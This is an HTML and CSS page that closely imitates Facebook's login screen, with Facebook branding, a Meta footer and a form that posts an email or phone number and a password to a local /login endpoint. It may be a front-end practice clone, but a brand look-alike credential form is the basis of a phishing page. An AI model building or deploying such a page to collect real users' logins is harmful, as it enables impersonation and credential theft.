<!DOCTYPE html>
    <html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,  initialscal=1.0">
    <title>facebook/login</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: rgb(220, 226, 226);
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            align-items:flex-start;
            justify-content: center;
            margin-left: 5px;
            
            
        }
    
        .main-content {
            text-align: center;
            margin: auto;
            color: #333;
            font-size: 20px;
        }
    
        .main-content h1 {
            font-size: 60px;
            color: #0650fc;
            margin-bottom: -10px;
        }
    
        .main-content h2 {
            font-size: 23px;
            color: #333;
            margin-bottom: -20px;
            font-weight: 500;
        }
        
        .main-content h3 {
            font-size: 23px;
            color: #333;
            margin-bottom: -10px;
            font-weight: 500;
        }
        .main-content h4 {
            font-size: 14px;
            color: #333;
            margin-bottom: 50px;
            font-weight: lighter;
            margin-bottom: 100px;
        }
    
        .logincontainer {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: auto;
            padding: 20px;
        }
    
        .login-box {
            padding: 20px;
            background-color: white;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 300px;
            margin: 20px;
            margin-bottom: -20px;
        }
    
        .login-box input[type="text"],
        .login-box input[type="password"] {
            width: 94%;
            padding: 10px;
            margin-bottom: 20px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
    
        .login-box button {
            width: 100%;
            padding: 10px;
            background-color: #054ef7;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
    
        .login-box button:hover {
            background: #68a4e4;
        }
       
        
    .login-box .show-password {
            display: flex;
            align-items: center;
            margin-bottom: 10px;
        }
        .login-box a {
            color: #054ef7;
            text-decoration: none;
            font-size: 14px;
            font-weight: lighter;
            margin-top: 10px;
            text-align: center;
            display: block;
        }
        .login-box a:hover {
            text-decoration: underline;
        }
        .separator {
            display: flex;
            align-items: center;
            margin: 10px 0;
        }
        .separator hr {
            flex: 1;
            border: 0;
            border-top: 1px solid #ccc;
        }
        
        .new-account button {
            width: 50%;
            margin-top: 10px;
            padding: 10px;
            margin-left: 70px;
            background-color: #42b72a;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .new-account button:hover {
            background: #1ac25d;
        }
        
        footer {
            text-align: start;
            padding: 10px 10px;
            font-size: 14px;
            color: #888;
            background-color: #f7f5f5;
            word-spacing: 20px;
            line-height: 1.5;
            position: relative;
            width: 100%;
            margin-left: -0.3rem;
        }
        footer p {
            margin: 0;
            padding: 0;
        }
        footer p2 {
            margin: 0;
            padding: 0;
            font-size: 12px;
            color: #888;
            text-align: center;
            word-spacing: normal;
        }
    
       
        
    </style>
    <body>
      <div class="login wrapper">
         <div class="main-content">
           <h1>facebook</h1>
           <h2>Facebook helps you connect and </h2>
           <h3>share with the people in your life.</h3>    
        </div>
        <div class="logincontainer">
         <div class="login-box"> 
            <form action="/login" method="POST">
                  <input type="text" name="email" placeholder="Email or Phone Number" required>
                <input type="password" id="password" name="password" placeholder="Password" required>
                <label class="show-password">
                    <input type="checkbox" onclick="togglePassword()"id="show-password"> Show Password 
                  </label>
                <button type="submit">Log In</button>
                <a href="#">Forgotten password?</a>
                <div class="separator">
                    <hr>
                </div>
                <div class="new-account">
                    <button type="button" onclick="window.location.href='register.html'">
                      Create New Account
                    </button>
                 </div>
            </form> 
        </div> 
      </div>
      <div class="main-content">
        <h4>Create a page for a celebrity, brand or business</h4>
      </div> 
      <footer>
          <p>SignUp Login Messenger Facebook Lite Video Meta Pay Meta Store Meta Quest 
            Ray-Ban Meta Meta AI Instagram Threads Voting Information Centre Privacy Policy Privacy Centre
            About Create ad Create Page Developers Careers Cookies AdChoices Terms Help Contact uploading and non-users Settings Activity log</p>
          <p2>Meta © 2025</p2>
      </footer>
      <script>
          const passwordInput = document.getElementById("password");
          const showPasswordCheckbox = document.getElementById("show-password");
        
          showPasswordCheckbox.addEventListener("change", function () {
            passwordInput.type = this.checked ? "text" : "password";
          });
      </script>
    </body>
    </html>